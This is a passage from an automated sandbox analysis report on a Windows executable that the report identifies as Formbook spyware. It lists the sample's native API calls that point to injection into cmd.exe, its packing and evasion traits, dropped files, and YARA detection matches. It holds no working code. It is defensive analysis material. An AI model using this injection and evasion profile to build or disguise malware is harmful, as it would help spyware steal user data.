13_2_02E398A0 NtWriteVirtualMemory, 13_2_02E398A0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E3B040 NtSuspendThread, 13_2_02E3B040 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39820 NtEnumerateKey, 13_2_02E39820 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E399D0 NtCreateProcessEx, 13_2_02E399D0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39950 NtQueueApcThread, 13_2_02E39950 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39660 NtAllocateVirtualMemory, 13_2_02E39660 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39670 NtQueryInformationProcess, 13_2_02E39670 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39650 NtQueryValueKey, 13_2_02E39650 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39610 NtEnumerateValueKey, 13_2_02E39610 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E397A0 NtUnmapViewOfSection, 13_2_02E397A0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39760 NtOpenProcess, 13_2_02E39760 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E3A770 NtOpenThread, 13_2_02E3A770 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39730 NtQueryVirtualMemory, 13_2_02E39730 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E3A710 NtOpenProcessToken, 13_2_02E3A710 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E395F0 NtQueryInformationFile, 13_2_02E395F0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39520 NtWaitForSingleObject, 13_2_02E39520 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E3AD30 NtSetContextThread, 13_2_02E3AD30 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_00519C90 NtCreateFile, 13_2_00519C90 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_00519D40 NtReadFile, 13_2_00519D40 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_00519DC0 NtClose, 13_2_00519DC0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_00519D3A NtReadFile, 13_2_00519D3A
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_00162234 0_2_00162234 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_0016865D 0_2_0016865D Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_049948DA 0_2_049948DA Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_0499C468 0_2_0499C468 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04991670 0_2_04991670 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04991B81 0_2_04991B81 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_049957A0 0_2_049957A0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04993FF8 0_2_04993FF8 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_049937F0 0_2_049937F0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_0499DF10 0_2_0499DF10 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04991361 0_2_04991361 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04992C00 0_2_04992C00 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04994428 0_2_04994428 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_0499D990 0_2_0499D990 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04996530 0_2_04996530 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04997530 0_2_04997530 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_0499AD58 0_2_0499AD58 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04997540 0_2_04997540 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04996540 0_2_04996540 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04997970 0_2_04997970 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04997960 0_2_04997960 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_0499BAB0 0_2_0499BAB0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_049956A1 0_2_049956A1 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_0499B2C0 0_2_0499B2C0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04997AE1 0_2_04997AE1 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04997208 0_2_04997208 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04996F88 0_2_04996F88 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04997710 0_2_04997710 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04997720 0_2_04997720 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_0499374F 0_2_0499374F Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04996F78 0_2_04996F78 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_07360070 0_2_07360070 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00401030 3_2_00401030 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041E890 3_2_0041E890 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041E1FD 3_2_0041E1FD Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041D38A 3_2_0041D38A Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041E52A 3_2_0041E52A Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00402D8A 3_2_00402D8A Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00402D90 3_2_00402D90 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00409E2C 3_2_00409E2C Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00409E30 3_2_00409E30 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041DF99 3_2_0041DF99 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00402FB0 3_2_00402FB0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00F52234 3_2_00F52234 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_00F5865D 3_2_00F5865D Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019899BF 3_2_019899BF Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0196F900 3_2_0196F900 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01984120 3_2_01984120 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0197B090 3_2_0197B090 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A320A8 3_2_01A320A8 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019920A0 3_2_019920A0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A328EC 3_2_01A328EC Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A3E824 3_2_01A3E824 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A21002 3_2_01A21002 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0198A830 3_2_0198A830 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0198EB9A 3_2_0198EB9A Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0199138B 3_2_0199138B Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0199EBB0 3_2_0199EBB0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0199ABD8 3_2_0199ABD8 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A123E3 3_2_01A123E3 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A2DBD2 3_2_01A2DBD2 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A203DA 3_2_01A203DA Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A32B28 3_2_01A32B28 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0198A309 3_2_0198A309 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0198AB40 3_2_0198AB40 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A0CB4F 3_2_01A0CB4F Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A322AE 3_2_01A322AE Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A24AEF 3_2_01A24AEF Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A1FA2B 3_2_01A1FA2B Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0198B236 3_2_0198B236 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01992581 3_2_01992581 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A22D82 3_2_01A22D82 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0197D5E0 3_2_0197D5E0 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A325DD 3_2_01A325DD Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A32D07 3_2_01A32D07 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01960D20 3_2_01960D20 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A31D55 3_2_01A31D55 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A24496 3_2_01A24496 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0197841F 3_2_0197841F Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A2D466 3_2_01A2D466 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0198B477 3_2_0198B477 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A31FF1 3_2_01A31FF1 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A3DFCE 3_2_01A3DFCE Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A11EB6 3_2_01A11EB6 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A32EF7 3_2_01A32EF7 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01985600 3_2_01985600 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01986E30 3_2_01986E30 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_01A2D616 3_2_01A2D616 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EB4AEF 13_2_02EB4AEF Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EC22AE 13_2_02EC22AE Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EAFA2B 13_2_02EAFA2B Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E1B236 13_2_02E1B236 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EA23E3 13_2_02EA23E3 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EB03DA 13_2_02EB03DA Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EBDBD2 13_2_02EBDBD2 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E2ABD8 13_2_02E2ABD8 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E2EBB0 13_2_02E2EBB0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E2138B 13_2_02E2138B Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E1AB40 13_2_02E1AB40 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E9CB4F 13_2_02E9CB4F Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EC2B28 13_2_02EC2B28 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E1A309 13_2_02E1A309 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EC28EC 13_2_02EC28EC Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E220A0 13_2_02E220A0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EC20A8 13_2_02EC20A8 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E0B090 13_2_02E0B090 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02ECE824 13_2_02ECE824 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E1A830 13_2_02E1A830 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EB1002 13_2_02EB1002 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E199BF 13_2_02E199BF Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E14120 13_2_02E14120 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02DFF900 13_2_02DFF900 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EC2EF7 13_2_02EC2EF7 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E16E30 13_2_02E16E30 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EBD616 13_2_02EBD616 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EC1FF1 13_2_02EC1FF1 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02ECDFCE 13_2_02ECDFCE Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EB4496 13_2_02EB4496 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EBD466 13_2_02EBD466 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E1B477 13_2_02E1B477 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E0841F 13_2_02E0841F Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E0D5E0 13_2_02E0D5E0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EC25DD 13_2_02EC25DD Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E22581 13_2_02E22581 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EB2D82 13_2_02EB2D82 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EC1D55 13_2_02EC1D55 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02EC2D07 13_2_02EC2D07 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02DF0D20 13_2_02DF0D20 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_0051E890 13_2_0051E890 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_0051E1FD 13_2_0051E1FD Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_0051E52A 13_2_0051E52A Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_00502D90 13_2_00502D90 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_00502D8A 13_2_00502D8A Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_00509E30 13_2_00509E30 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_00509E2C 13_2_00509E2C Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_0051DF99 13_2_0051DF99 Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_00502FB0 13_2_00502FB0
 Found potential string decryption / allocating functions Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: String function: 0196B150 appears 145 times Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 02DFB150 appears 136 times
 Sample file is different than original file name gathered from version info Show sources
 Source: uVSV3amss8eu5Sr.exe Binary or memory string: OriginalFilename vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000000.00000000.355750027.0000000000162000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedAq.exe, vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.380250068.0000000007090000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.379653630.0000000006470000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameB2B.exe4 vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378004309.0000000004A80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWinRar.dll. vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.379292234.0000000006290000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.380640171.0000000007190000.00000002.00000001.sdmp Binary or memory string: originalfilename vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.380640171.0000000007190000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.375722005.000000000084A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamemscorwks.dllT vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe Binary or memory string: OriginalFilename vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000003.00000002.427481922.0000000000F52000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedAq.exe, vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430593281.0000000001BEF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430770312.0000000001DAD000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs uVSV3amss8eu5Sr.exe Source: uVSV3amss8eu5Sr.exe Binary or memory string: OriginalFilenamedAq.exe, vs uVSV3amss8eu5Sr.exe
 Yara signature match Show sources
 Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3) Show sources
 Source: uVSV3amss8eu5Sr.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ Source: JOOUCiAlE.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/6@6/3
 Contains functionality to adjust token privileges (e.g. debug / backup) Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04A6063A AdjustTokenPrivileges, 0_2_04A6063A Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04A60603 AdjustTokenPrivileges, 0_2_04A60603
 Creates files inside the user directory Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File created: C:\Users\user\AppData\Roaming\JOOUCiAlE.exe Jump to behavior
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_01
 Creates temporary files Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File created: C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp Jump to behavior
 PE file has an executable .text section and no other executable section Show sources
 Source: uVSV3amss8eu5Sr.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using the .NET runtime (Probably coded in C#) Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll Jump to behavior Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
 Reads ini files Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
 Reads software policies Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
 Reads the hosts file Show sources
 Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
 Sample is known by Antivirus Show sources
 Source: uVSV3amss8eu5Sr.exe Virustotal: Detection: 23%
 Sample reads its own file content Show sources
 Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File read: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Jump to behavior
 Spawns processes Show sources
